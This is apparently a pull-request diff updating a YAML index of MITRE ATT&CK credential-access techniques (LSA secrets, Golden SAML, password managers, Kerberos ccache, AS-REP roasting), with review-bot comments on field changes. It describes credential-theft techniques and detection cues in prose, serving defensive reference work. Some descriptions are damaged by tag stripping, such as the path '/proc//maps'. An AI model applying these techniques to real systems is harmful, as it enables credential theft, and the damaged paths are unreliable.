kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Ed Williams, Trustwave, SpiderLabs
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor processes and command-line arguments for program
execution that may be indicative of credential dumping. Remote access tools
may contain built-in features or incorporate existing tools like Mimikatz.
@@ -45302,31 +45921,63 @@ credential-access:
such as PowerSploit''s Invoke-Mimikatz module,(Citation: Powersploit) which
may require additional logging features to be configured in the operating
system to collect necessary information for analysis.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
+ created: '2020-02-21T16:22:09.493Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1003/004
+ external_id: T1003.004
+ - source_name: Tilbury Windows Credentials
+ description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
+ Mitigation, Defense. Retrieved February 21, 2020.'
+ url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
+ - source_name: ired Dumping LSA Secrets
+ description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
+ Retrieved February 21, 2020.
+ url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
+ - source_name: Microsoft AD Admin Tier Model
+ description: Microsoft. (2019, February 14). Active Directory administrative
+ tier model. Retrieved February 21, 2020.
+ url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
+ - source_name: Passcape LSA Secrets
+ description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
+ 2020.
+ url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
+ - source_name: Powersploit
+ description: PowerSploit. (n.d.). Retrieved December 4, 2014.
+ url: https://github.com/mattifestation/PowerSploit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1003.004
atomic_tests: []
T1606.002:
technique:
- modified: '2024-03-01T17:55:56.116Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Forge Web Credentials: SAML token'
description: |-
An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the NotOnOrAfter
value of the conditions ...
element in a token. This value can be changed using the AccessTokenLifetime
in a LifetimeTokenPolicy
.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)
An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.
- An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
+ An adversary may gain administrative Entra ID privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Blake Strom, Microsoft 365 Defender
- Oleg Kolesnikov, Securonix
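Review bot: `x_mitre_permissions_required` (`SYSTEM`) is removed from T1003.004 here, and the same key goes from T1555.005 and T1556.002 later, while the description still opens with "Adversaries with SYSTEM access". Removing it tracks upstream ATT&CK, which dropped the field, but any local logic that reads it to decide which tests need elevation now gets nothing; confirm nothing in the repo keys on it. In the same hunk the T1606.002 description swaps "Azure AD" for "Entra ID", matching the platform rename, and the `x_mitre_attack_spec_version: 3.2.0` line inserted after `kill_chain_phases` is the same line a later hunk deletes from the bottom of that object, so it is a move rather than a duplicate key.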
@@ -45339,14 +45990,14 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- SaaS
- Windows
- - Office 365
- - Google Workspace
- IaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
- 'Web Credential: Web Credential Creation'
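Review bot: T1606.002 loses `Azure AD`, `Office 365` and `Google Workspace` from `x_mitre_platforms` and gains `Office Suite` and `Identity Provider`. Because this technique carries the `Golden SAML` atomic test (the `atomic_tests:` list just below), anything that lists that test under the Google Workspace platform must be regenerated to drop it, and any listing for the new `Identity Provider` platform added in the same change; otherwise the per-platform view and the technique metadata disagree about where the test applies.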
@@ -45387,9 +46038,6 @@ credential-access:
url: https://www.sygnia.co/golden-saml-advisory
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1606.002
atomic_tests:
- name: Golden SAML
@@ -45435,7 +46083,7 @@ credential-access:
name: powershell
T1003.007:
technique:
- modified: '2024-04-10T16:41:01.496Z'
+ modified: '2024-10-15T15:13:32.253Z'
name: 'OS Credential Dumping: Proc Filesystem'
description: |-
Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc//maps` file shows how memory is mapped within the process’s virtual address space. And `/proc//mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)
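Review bot: the unchanged T1003.007 description reads `/proc//maps` and `/proc//mem`, so the process-id placeholder that belongs between the slashes has been lost (presumably it was written in angle brackets upstream and the HTML-stripping step swallowed it), leaving a path that exists on no Linux host. Only `modified` changes in this hunk, so the regeneration is not the cause, but the tag-stripping step should be changed to keep or escape angle-bracketed placeholders before the next refresh. The citation key `Picus Labs Proc cump 2022` is misspelt upstream and must stay as is, because the `(Citation: ...)` marker in the description references it verbatim.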
@@ -45498,81 +46146,79 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.007
atomic_tests: []
T1555.005:
technique:
+ modified: '2024-08-19T13:53:33.661Z'
+ name: Password Managers
+ description: |-
+ Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
+
+ Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
+ Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_contributors:
+ - Matt Burrough, @mattburrough, Microsoft
+ x_mitre_deprecated: false
+ x_mitre_detection: "Consider monitoring API calls, file read events, and processes
+ for suspicious activity that could indicate searching in process memory of
+ password managers. \n\nConsider monitoring file reads surrounding known password
+ manager applications."
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Matt Burrough, @mattburrough, Microsoft
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Process: Process Access'
+ - 'Process: OS API Execution'
+ - 'File: File Access'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
created: '2021-01-22T16:08:40.629Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1555.005
url: https://attack.mitre.org/techniques/T1555/005
- - source_name: ise Password Manager February 2019
- url: https://www.ise.io/casestudies/password-manager-hacking/
- description: 'ise. (2019, February 19). Password Managers: Under the Hood
- of Secrets Management. Retrieved January 22, 2021.'
+ external_id: T1555.005
+ - source_name: Cyberreason Anchor December 2019
+ description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
+ A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
+ 10, 2020.'
+ url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
- source_name: FoxIT Wocao December 2019
- url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
description: 'Dantzig, M. v., Schamper, E. (2019, December 19). Operation
Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved
October 8, 2020.'
+ url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
+ - source_name: ise Password Manager February 2019
+ description: 'ise. (2019, February 19). Password Managers: Under the Hood
+ of Secrets Management. Retrieved January 22, 2021.'
+ url: https://www.ise.io/casestudies/password-manager-hacking/
- source_name: Github KeeThief
- url: https://github.com/GhostPack/KeeThief
description: Lee, C., Schoreder, W. (n.d.). KeeThief. Retrieved February 8,
2021.
+ url: https://github.com/GhostPack/KeeThief
- source_name: NVD CVE-2019-3610
- url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
description: National Vulnerability Database. (2019, October 9). CVE-2019-3610
Detail. Retrieved April 14, 2021.
- - source_name: Cyberreason Anchor December 2019
- url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
- description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
- A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
- 10, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
- name: Password Managers
- description: |-
- Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
-
- Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
- Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- x_mitre_detection: "Consider monitoring API calls, file read events, and processes
- for suspicious activity that could indicate searching in process memory of
- password managers. \n\nConsider monitoring file reads surrounding known password
- manager applications."
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Process: Process Access'
- - 'Process: OS API Execution'
- - 'File: File Access'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1040:
technique:
- modified: '2024-04-19T12:32:44.370Z'
+ modified: '2024-10-15T15:11:55.217Z'
name: Network Sniffing
description: |-
Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
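Review bot: T1555.005 still has no `identifier:` key (the object goes straight from `x_mitre_modified_by_ref` to `atomic_tests: []`), whereas T1555.001, T1003.004, T1003.007 and T1040 in this file each carry `identifier: <technique id>` before `atomic_tests`. The inconsistency predates this PR, but since the block is being rewritten wholesale the generator should emit `identifier: T1555.005` here too. Otherwise the hunk is a reorder plus `revoked: false`, the removal of `x_mitre_permissions_required` (`User`) and the `x_mitre_version` bump to '1.1'; the description text is identical before and after.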
@@ -45657,12 +46303,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1040
atomic_tests: []
T1552.002:
technique:
- modified: '2023-07-28T18:29:56.525Z'
+ modified: '2024-10-15T16:26:46.873Z'
name: 'Unsecured Credentials: Credentials in Registry'
description: |-
Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
@@ -45711,38 +46356,13 @@ credential-access:
url: https://pentestlab.blog/2017/04/19/stored-credentials/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.002
atomic_tests: []
T1556.002:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
- type: attack-pattern
- created: '2020-02-11T19:05:45.829Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.002
- url: https://attack.mitre.org/techniques/T1556/002
- - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
- description: Fuller, R. (2013, September 11). Stealing passwords every time
- they change. Retrieved November 21, 2017.
- source_name: Carnal Ownage Password Filters Sept 2013
- - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
- description: Bialek, J. (2013, September 15). Intercepting Password Changes
- With Function Hooking. Retrieved November 21, 2017.
- source_name: Clymb3r Function Hook Passwords Sept 2013
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T16:16:18.271Z'
name: 'Modify Authentication Process: Password Filter DLL'
description: "Adversaries may register malicious password filter dynamic link
libraries (DLLs) into the authentication process to acquire user credentials
@@ -45766,76 +46386,129 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Creation'
- 'Module: Module Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+ created: '2020-02-11T19:05:45.829Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/002
+ external_id: T1556.002
+ - source_name: Clymb3r Function Hook Passwords Sept 2013
+ description: Bialek, J. (2013, September 15). Intercepting Password Changes
+ With Function Hooking. Retrieved November 21, 2017.
+ url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+ - source_name: Carnal Ownage Password Filters Sept 2013
+ description: Fuller, R. (2013, September 11). Stealing passwords every time
+ they change. Retrieved November 21, 2017.
+ url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.002
atomic_tests: []
- T1558.004:
- technique:
- x_mitre_platforms:
- - Windows
+ T1558.005:
+ technique:
+ modified: '2024-10-14T21:26:37.856Z'
+ name: Ccache Files
+ description: "\nAdversaries may attempt to steal Kerberos tickets stored in
+ credential cache files (or ccache). These files are used for short term storage
+ of a user's active session credentials. The ccache file is created upon user
+ authentication and allows for access to multiple services without the user
+ having to re-enter credentials. \n\nThe /etc/krb5.conf
configuration
+ file and the KRB5CCNAME
environment variable are used to set
+ the storage location for ccache entries. On Linux, credentials are typically
+ stored in the `/tmp` directory with a naming format of `krb5cc_%UID%` or `krb5.ccache`.
+ On macOS, ccache entries are stored by default in memory with an `API:{uuid}`
+ naming scheme. Typically, users interact with ticket storage using kinit
,
+ which obtains a Ticket-Granting-Ticket (TGT) for the principal; klist
,
+ which lists obtained tickets currently held in the credentials cache; and
+ other built-in binaries.(Citation: Kerberos GNU/Linux)(Citation: Binary Defense
+ Kerberos Linux)\n\nAdversaries can collect tickets from ccache files stored
+ on disk and authenticate as the current user without their password to perform
+ [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.
+ Adversaries can also use these tickets to impersonate legitimate users with
+ elevated privileges to perform [Privilege Escalation](https://attack.mitre.org/tactics/TA0004).
+ Tools like Kekeo can also be used by adversaries to convert ccache files to
+ Windows format for further [Lateral Movement](https://attack.mitre.org/tactics/TA0008).
+ On macOS, adversaries may use open-source tools or the Kerberos framework
+ to interact with ccache files and extract TGTs or Service Tickets via lower-level
+ APIs.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: Linux Kerberos
+ Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo) "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_contributors:
- - Yossi Nisani, Cymptom
- - James Dunn, @jamdunnDFW, EY
- - Swapnil Kumbhar
- - Jacques Pluviose, @Jacqueswildy_IT
- - Dan Nutting, @KerberToast
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'File: File Access'
type: attack-pattern
- created: '2020-08-24T13:43:00.028Z'
+ id: attack-pattern--394220d9-8efc-4252-9040-664f7b115be6
+ created: '2024-09-17T15:02:31.324Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1558.004
- url: https://attack.mitre.org/techniques/T1558/004
- - source_name: Harmj0y Roasting AS-REPs Jan 2017
- url: http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/
- description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved August
- 24, 2020.
- - source_name: Microsoft Kerberos Preauth 2014
- url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
- description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
- It Should Not Be Disabled. Retrieved August 25, 2020.'
- - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
- url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
- description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
- with AS-REP Roasting. Retrieved August 24, 2020.
- - description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
- Guard Dog of Hades. Retrieved March 22, 2018.
- source_name: SANS Attacking Kerberos Nov 2014
- url: https://redsiege.com/kerberoast-slides
- - url: https://adsecurity.org/?p=2293
- description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
- Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
- Domain. Retrieved March 22, 2018.
- source_name: AdSecurity Cracking Kerberos Dec 2015
- - url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
- using Azure Security Center. Retrieved March 23, 2018.
- source_name: Microsoft Detecting Kerberoasting Feb 2018
- - source_name: Microsoft 4768 TGT 2017
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
- description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
- ticket (TGT) was requested. Retrieved August 24, 2020.'
- modified: '2021-06-07T19:23:33.039Z'
+ url: https://attack.mitre.org/techniques/T1558/005
+ external_id: T1558.005
+ - source_name: Binary Defense Kerberos Linux
+ description: " ARC Labs, Dwyer, John. Gonzalez, Eric. Hudak, Tyler. (2024,
+ October 1). Shining a Light in the Dark – How Binary Defense Uncovered an
+ APT Lurking in Shadows of IT. Retrieved October 7, 2024."
+ url: https://www.binarydefense.com/resources/blog/shining-a-light-in-the-dark-how-binary-defense-uncovered-an-apt-lurking-in-shadows-of-it/
+ - source_name: Kerberos GNU/Linux
+ description: Adepts of 0xCC. (2021, January 28). The Kerberos Credential Thievery
+ Compendium (GNU/Linux). Retrieved September 17, 2024.
+ url: https://adepts.of0x.cc/kerberos-thievery-linux/
+ - source_name: Kekeo
+ description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
+ url: https://github.com/gentilkiwi/kekeo
+ - source_name: SpectorOps Bifrost Kerberos macOS 2019
+ description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
+ Retrieved October 6, 2021.
+ url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
+ - source_name: Brining MimiKatz to Unix
+ description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
+ Mimikatz et al to UNIX. Retrieved October 13, 2021.
+ url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
+ - source_name: Linux Kerberos Tickets
+ description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
+ Teams. Retrieved October 4, 2021.
+ url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1558.004:
+ technique:
+ modified: '2024-10-15T15:32:07.850Z'
name: 'Steal or Forge Kerberos Tickets: AS-REP Roasting'
description: "Adversaries may reveal credentials of accounts that have disabled
Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002)
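Review bot: The reference list of the new T1558.005 entry (`Binary Defense Kerberos Linux` through `Linux Kerberos Tickets`) carries four of the six sources this change removes from T1558 further down, but not `MIT ccache` or `macOS kerberos framework MIT`, which the dropped Linux ccache and macOS KCM paragraphs cite as `(Citation: MIT ccache)` and `(Citation: macOS kerberos framework MIT)`. If that text was carried over into this entry, those two markers need matching entries here or they render as dangling citations; if the text was rewritten without them, nothing to do. Minor: the Binary Defense description string starts with a leading space (`" ARC Labs, Dwyer, John. ...`) that will show up in the rendered citation.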
@@ -45870,6 +46543,13 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Yossi Nisani, Cymptom
+ - James Dunn, @jamdunnDFW, EY
+ - Swapnil Kumbhar
+ - Jacques Pluviose, @Jacqueswildy_IT
+ - Dan Nutting, @KerberToast
+ x_mitre_deprecated: false
x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
TGS service ticket requests. Particularly investigate irregular patterns of
activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within
@@ -45877,32 +46557,68 @@ credential-access:
pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking
Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation:
Microsoft 4768 TGT 2017)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Credential Request'
- x_mitre_permissions_required:
- - User
x_mitre_system_requirements:
- Valid domain account
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+ created: '2020-08-24T13:43:00.028Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1558/004
+ external_id: T1558.004
+ - source_name: Microsoft Detecting Kerberoasting Feb 2018
+ description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+ using Azure Security Center. Retrieved March 23, 2018.
+ url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
+ - source_name: Harmj0y Roasting AS-REPs Jan 2017
+ description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved September
+ 23, 2024.
+ url: https://blog.harmj0y.net/activedirectory/roasting-as-reps/
+ - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
+ description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
+ with AS-REP Roasting. Retrieved August 24, 2020.
+ url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
+ - source_name: SANS Attacking Kerberos Nov 2014
+ description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+ Guard Dog of Hades. Retrieved March 22, 2018.
+ url: https://redsiege.com/kerberoast-slides
+ - source_name: AdSecurity Cracking Kerberos Dec 2015
+ description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
+ Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
+ Domain. Retrieved March 22, 2018.
+ url: https://adsecurity.org/?p=2293
+ - source_name: Microsoft 4768 TGT 2017
+ description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
+ ticket (TGT) was requested. Retrieved August 24, 2020.'
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
+ - source_name: Microsoft Kerberos Preauth 2014
+ description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
+ It Should Not Be Disabled. Retrieved August 25, 2020.'
+ url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1558.004
atomic_tests: []
T1558:
